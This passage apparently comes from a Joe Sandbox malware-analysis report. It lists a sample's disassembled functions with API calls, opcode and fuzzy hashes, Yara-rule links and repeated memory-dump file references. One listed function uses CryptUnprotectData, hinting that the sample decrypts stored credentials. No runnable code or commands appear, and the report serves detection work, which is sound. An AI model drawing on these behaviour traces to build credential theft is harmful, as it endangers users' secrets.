                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (>TR$wvz8$zw
                          • API String ID: 0-1238287703
                          • Opcode ID: 97ca21d544cfb1b713bc0a66c299761bbc59a4ff4a66ca7c7cf6a73abd4b3729
                          • Instruction ID: fedf6192fc5bafc532afd747a0813dd0464993e62f505333a70b1e3e2cad26fb
                          • Opcode Fuzzy Hash: 97ca21d544cfb1b713bc0a66c299761bbc59a4ff4a66ca7c7cf6a73abd4b3729
                          • Instruction Fuzzy Hash: 17B204F360C204AFE3046E2DDC8567AFBE9EF94720F1A493DEAC4C3744E63598018696
                          Function 0071CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0072B110,00000000,00000001,0072B100,?), ref: 0071CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0071CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0071CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: d853b685c31b159ff6887d1644eab4c8a9fffbf94081498898b1ca7b6a37a8e0
                          • Instruction ID: d749da31e737397af6589c9ec039129247eaf1d978d8752d1fe7cef1a2bd8351
                          • Opcode Fuzzy Hash: d853b685c31b159ff6887d1644eab4c8a9fffbf94081498898b1ca7b6a37a8e0
                          • Instruction Fuzzy Hash: A2316671A40628AFD710DB98CC82FEA77B9DB88B10F104184FA04EB2D0D7B4AE44CF90
                          Function 00709B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00709B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00709BB3
                          • LocalFree.KERNEL32(?), ref: 00709BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 8fc5cb12fcfa5485ec61bec916d6e0cf7f4ae2d2554b97b9b8d81d45343f9e21
                          • Instruction ID: 07fb5be9d4147e5a2f0439effdab352710d34ab9ee83b8b01d71ee7de220e5aa
                          • Opcode Fuzzy Hash: 8fc5cb12fcfa5485ec61bec916d6e0cf7f4ae2d2554b97b9b8d81d45343f9e21
                          • Instruction Fuzzy Hash: 1A011DB5E45309ABE7109BA4DC45FAFB7B8EB44B00F104554FA04AB281E7B49A00CBE1
                          Function 009A60EB Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: \7/
                          • API String ID: 0-1966033871
                          • Opcode ID: 1b3f70ca5e5e383b2199e5097c0947f485bbd39dc8ad25b1b9da9090812f6d75
                          • Instruction ID: 2644c7f8171a71868104f542f6ff4591e4889b998a8ccfd16f790eded28e4202
                          • Opcode Fuzzy Hash: 1b3f70ca5e5e383b2199e5097c0947f485bbd39dc8ad25b1b9da9090812f6d75
                          • Instruction Fuzzy Hash: 6D61F1B290C7189FE3047E69EC8577ABBE4EF54320F164A3CEAC487740EA7958518787
                          Function 00B99896 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Q^
                          • API String ID: 0-3614340472
                          • Opcode ID: 051b3831c67d566e1cf9c98eb7e9ed0c7e9e363937728fbcef8441a12a0cde63
                          • Instruction ID: b100c8140f7faf70b7f4a213313569a48c4be9eba820dbbdfa0e317690fc2162
                          • Opcode Fuzzy Hash: 051b3831c67d566e1cf9c98eb7e9ed0c7e9e363937728fbcef8441a12a0cde63
                          • Instruction Fuzzy Hash: 225146B260C304DFCB80AE6DDCC4639BBE5EB98310F76497DD9C687704E6321845A643
                          Function 00A8A744 Relevance: .2, Instructions: 228COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76b728d0de5457d630f5aa8ebebb6951bb9b56858ef88f0c64a93ff325a08496
                          • Instruction ID: 52c73098716a8a83725b11bcb9a602e50265626a269d5361e9a84824bedcc000
                          • Opcode Fuzzy Hash: 76b728d0de5457d630f5aa8ebebb6951bb9b56858ef88f0c64a93ff325a08496
                          • Instruction Fuzzy Hash: 057106B3A087049FE3046E29DC4476AB7E6EF94720F1A893DD6C883344EA3569058797
                          Function 0099B161 Relevance: .2, Instructions: 209COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f366c713b49e764985fdcc7352009a9c88595a7e9d5d0763751389d2c43aa89
                          • Instruction ID: 5aba6497b6aaeffec1f529abe00270e08ab89779d44a71e74160a166ee8be678
                          • Opcode Fuzzy Hash: 6f366c713b49e764985fdcc7352009a9c88595a7e9d5d0763751389d2c43aa89
                          • Instruction Fuzzy Hash: 8A5168F3D182285BF70C292CAD187767A99D790320F1A433DEB96A7784ED69590082C6
                          Function 00AA1E05 Relevance: .2, Instructions: 164COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 674690b80ea7b897fdd83440394298c9c1d8a658b99274361204b678ff1c1e27
                          • Instruction ID: 06eccb5019434b28c15b649d72eddd492bcff2bffcff5f0526ac6f932253510d
                          • Opcode Fuzzy Hash: 674690b80ea7b897fdd83440394298c9c1d8a658b99274361204b678ff1c1e27
                          • Instruction Fuzzy Hash: B2514AF3E083048BE3006E29DD8477AB7D6AFD0721F2AC63DDAC447788F57959458246
                          Function 00A44669 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 157a66cad0c1c330b235610f5a87bf22bf3e58d0f2963576bd7db0b387a2d4fd
                          • Instruction ID: 38e1461f57ffc426968cf1f26615b9fc567db903eb8108a12c5caf1c26c369af
                          • Opcode Fuzzy Hash: 157a66cad0c1c330b235610f5a87bf22bf3e58d0f2963576bd7db0b387a2d4fd
                          • Instruction Fuzzy Hash: 7C414DF3A081045FE3049A19DC8576BB7EADFD4730F1AC63DDAD457784ED39A8058292
                          Function 009A8EB6 Relevance: .1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 79a66662e718c7bda89a7cb69867c501deaab8f58a2adca4489cfd600d85f7f0
                          • Instruction ID: 3775dc30832274d53ede400db2f5d39cefba29116edf3237c9933df07850f19a
                          • Opcode Fuzzy Hash: 79a66662e718c7bda89a7cb69867c501deaab8f58a2adca4489cfd600d85f7f0
                          • Instruction Fuzzy Hash: 284176F3E185105BF714AA2DEC9477EBA96DBD4320F1B453DDBD583380E839080582C6
                          Function 009C5792 Relevance: .1, Instructions: 86COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 952315408376f0184f1421fb3df3330db5eed0b6b1c5569b99ad2b73d7fd3324
                          • Instruction ID: 69e87b5936eb118b5ad2ed517ea5787fc18d693dd2fe7fe4d23f2b777afa609d
                          • Opcode Fuzzy Hash: 952315408376f0184f1421fb3df3330db5eed0b6b1c5569b99ad2b73d7fd3324
                          • Instruction Fuzzy Hash: 6D2136F3F582206BF3186938DC4576BB696AFD0720F2B813CD6C993B84E53899164781
                          Function 007185B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00718636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 007186AA
                          • StrStrA.SHLWAPI(?,010DDC18), ref: 007186CF
                          • lstrcpyn.KERNEL32(009393D0,?,00000000), ref: 007186EE
                          • lstrlen.KERNEL32(?), ref: 00718701
                          • wsprintfA.USER32 ref: 00718711
                          • lstrcpy.KERNEL32(?,?), ref: 00718727
                          • StrStrA.SHLWAPI(?,010DDBE8), ref: 00718754
                          • lstrcpy.KERNEL32(?,009393D0), ref: 007187B4
                          • StrStrA.SHLWAPI(?,010DDA08), ref: 007187E1
                          • lstrcpyn.KERNEL32(009393D0,?,00000000), ref: 00718800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
